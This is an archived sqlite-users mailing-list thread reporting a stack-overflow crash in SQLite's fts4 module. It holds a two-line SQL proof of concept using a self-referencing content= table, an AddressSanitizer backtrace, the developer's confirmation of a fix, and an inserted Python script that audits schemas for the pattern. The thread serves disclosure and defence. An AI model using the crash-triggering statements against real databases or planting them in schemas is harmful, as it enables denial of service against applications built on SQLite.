Re: [sqlite] Re: stack-overflow issue in fts4 module

2019-11-25 Thread Richard Hipp
On 11/25/19, OBones  wrote:
> Maybe I'm completely wrong, but using t0 both as the name of the virtual
> table and the source for its content seems to me like the perfect
> condition to create an infinite recursion.

You are exactly correct in diagnosing the problem.  This is an attack
that we didn't think of.  The recursion is detected and blocked by
check-in https://www.sqlite.org/src/info/2eb997327c2c369c from last
week.

-- 
D. Richard Hipp
d...@sqlite.org
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
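The reply above confirms OBones's diagnosis: the content= option of the fts4 table points back at the table itself, so the FTS module's xFilter prepares a query on its own table and the backtrace in the original report loops through fts3FilterMethod -> sqlite3_step -> fts3NextMethod -> fts3FilterMethod until the stack runs out. For anyone who has to open database files from untrusted sources on a build that predates the fix, the following is an added example, not code from this thread or from SQLite: it reads only sqlite_master (an ordinary table, so no virtual table is connected or queried) and flags fts4 tables whose content= option names the table itself. The function names, the regular expression and the sample schema rows are all constructed for this example; the first sample row is the PoC from the report.

```python
"""Schema audit for the self-referencing fts4 content= pattern.

Added example (not SQLite's code, not from the thread). It parses the
CREATE VIRTUAL TABLE text that sqlite_master stores and reports fts4
tables whose content= option names the table itself. Only the schema
table is read, so the FTS module's xFilter is never reached on the
untrusted file.
"""
import re
import sqlite3

# SQL identifiers may be bare or quoted with "", [], `` or ''.
_IDENT = r"""(?:"[^"]*"|\[[^\]]*\]|`[^`]*`|'[^']*'|\w+)"""
_CREATE_VTAB = re.compile(
    r"^\s*CREATE\s+VIRTUAL\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?"
    + r"(?:" + _IDENT + r"\s*\.\s*)?"          # optional schema prefix
    + r"(?P<name>" + _IDENT + r")\s+USING\s+"
    + r"(?P<module>\w+)\s*\((?P<args>.*)\)\s*;?\s*$",
    re.IGNORECASE | re.DOTALL,
)


def unquote_ident(text):
    """Strip one layer of identifier/string quoting. Doubled inner quotes
    ("a""b") are not unescaped; that is good enough for a schema audit."""
    t = text.strip()
    if len(t) >= 2 and (t[0], t[-1]) in {('"', '"'), ("[", "]"), ("`", "`"), ("'", "'")}:
        return t[1:-1]
    return t


def content_target(sql):
    """For an fts4 virtual table with a content= option return
    (table_name, content_value); otherwise None. content= is an FTS4-only
    option; under fts3 'content=x' is just an oddly named column."""
    m = _CREATE_VTAB.match(sql)
    if not m or m.group("module").lower() != "fts4":
        return None
    name = unquote_ident(m.group("name"))
    # Arguments are comma separated. A comma inside a quoted value is not
    # handled here; it would only mis-split that one argument.
    for arg in m.group("args").split(","):
        key, eq, value = arg.partition("=")
        if eq and key.strip().lower() == "content":
            return name, unquote_ident(value)
    return None


def is_self_referencing(sql):
    """True when an fts4 table's content= names the table itself. SQLite
    folds ASCII case in identifiers, so compare case-insensitively. An
    empty content= value means a contentless table, which is harmless."""
    found = content_target(sql)
    if found is None:
        return False
    name, target = found
    return target != "" and target.lower() == name.lower()


def find_self_referencing_fts(rows):
    """rows: (name, sql) pairs as returned by
    SELECT name, sql FROM sqlite_master WHERE type='table'."""
    return [name for name, sql in rows if sql and is_self_referencing(sql)]


def scan_database(path):
    """Audit an untrusted database file read-only. Loading the schema
    parses the CREATE statements but does not connect or query any
    virtual table, so the FTS code path in the backtrace is not exercised."""
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        rows = con.execute(
            "SELECT name, sql FROM sqlite_master WHERE type = 'table'"
        ).fetchall()
    finally:
        con.close()
    return find_self_referencing_fts(rows)


# Constructed sample schema rows; the first one is the PoC from the report.
SAMPLE_SCHEMA = [
    ("t0", "CREATE VIRTUAL TABLE t0 USING fts4(content=t0,0)"),
    ("ft", 'CREATE VIRTUAL TABLE ft USING fts4(content="t2", a, b)'),
    ("FT_CI", 'CREATE VIRTUAL TABLE "FT_CI" USING fts4(a, content=ft_ci)'),
    ("nc", "CREATE VIRTUAL TABLE nc USING fts4(content='', y)"),
    ("plain", "CREATE TABLE plain(id INTEGER PRIMARY KEY, body TEXT)"),
    ("f3", "CREATE VIRTUAL TABLE f3 USING fts3(content=f3)"),
]

if __name__ == "__main__":
    print(find_self_referencing_fts(SAMPLE_SCHEMA))  # ['t0', 'FT_CI']
```

Run scan_database(path) on a file before issuing any query that touches its FTS tables; a non-empty result means the file should be rejected (or the FTS table dropped) rather than queried on a build that does not yet carry the check-in linked above. The check is a schema-level heuristic, not a replacement for upgrading the library.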


Re: [sqlite] Re: stack-overflow issue in fts4 module

2019-11-25 Thread OBones

林性伟(林以) wrote:
> Hi,
>
> Sorry for the inconvenience.
>
> poc, test.sql:
> CREATE VIRTUAL TABLE t0 USING fts4(content=t0,0);
> SELECT count() FROM t0(0);

Maybe I'm completely wrong, but using t0 both as the name of the virtual
table and the source for its content seems to me like the perfect
condition to create an infinite recursion.
The example in the documentation uses two tables: 
https://www.sqlite.org/fts3.html#_external_content_fts4_tables_


Regards


[sqlite] Re: stack-overflow issue in fts4 module

2019-11-21 Thread 林性伟(林以)
Hi,

Sorry for the inconvenience.

poc, test.sql:
CREATE VIRTUAL TABLE t0 USING fts4(content=t0,0);
SELECT count() FROM t0(0);

Full asan bt:
$ ./sqlite3
SQLite version 3.31.0 2019-11-19 21:22:16
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> .read test.sql
ASAN:DEADLYSIGNAL
=================================================================
==5120==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc62facc08 (pc 0x7fc7deb73ad0 bp 0x7ffc62fad450 sp 0x7ffc62facbf0 T0)
#0 0x7fc7deb73acf in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeacf)
#1 0x55e8762c6593 in sqlite3MemMalloc ../sqlite3.c:23169
#2 0x55e87624c111 in mallocWithAlarm ../sqlite3.c:27050
#3 0x55e87624c111 in sqlite3Malloc ../sqlite3.c:27080
#4 0x55e87625101f in dbMallocRawFinish ../sqlite3.c:27311
#5 0x55e876253812 in tokenExpr ../sqlite3.c:150870
#6 0x55e8764082d8 in yy_reduce ../sqlite3.c:154723
#7 0x55e8764082d8 in sqlite3Parser ../sqlite3.c:155620
#8 0x55e8764082d8 in sqlite3RunParser ../sqlite3.c:156894
#9 0x55e876415a18 in sqlite3Prepare ../sqlite3.c:126307
#10 0x55e87641665d in sqlite3LockAndPrepare ../sqlite3.c:126379
#11 0x55e87648e4f7 in sqlite3_prepare_v3 ../sqlite3.c:126484
#12 0x55e87648e4f7 in fts3FilterMethod ../sqlite3.c:166603
#13 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#14 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#15 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#16 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#17 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#18 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#19 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#20 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#21 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#22 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#23 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#24 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#25 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#26 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#27 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#28 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#29 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#30 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#31 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#32 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#33 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#34 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#35 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#36 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#37 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#38 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#39 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#40 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#41 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#42 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#43 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#44 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#45 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#46 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#47 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#48 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#49 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#50 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#51 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#52 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#53 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#54 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#55 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#56 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#57 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#58 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#59 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#60 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#61 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#62 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#63 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#64 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#65 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#66 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#67 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616
#68 0x55e8763c2ff1 in sqlite3VdbeExec ../sqlite3.c:91438
#69 0x55e8763dd6e9 in sqlite3Step ../sqlite3.c:82620
#70 0x55e8763dd6e9 in sqlite3_step ../sqlite3.c:82685
#71 0x55e876438cc2 in fts3NextMethod ../sqlite3.c:166465
#72 0x55e8764904b5 in fts3FilterMethod ../sqlite3.c:166616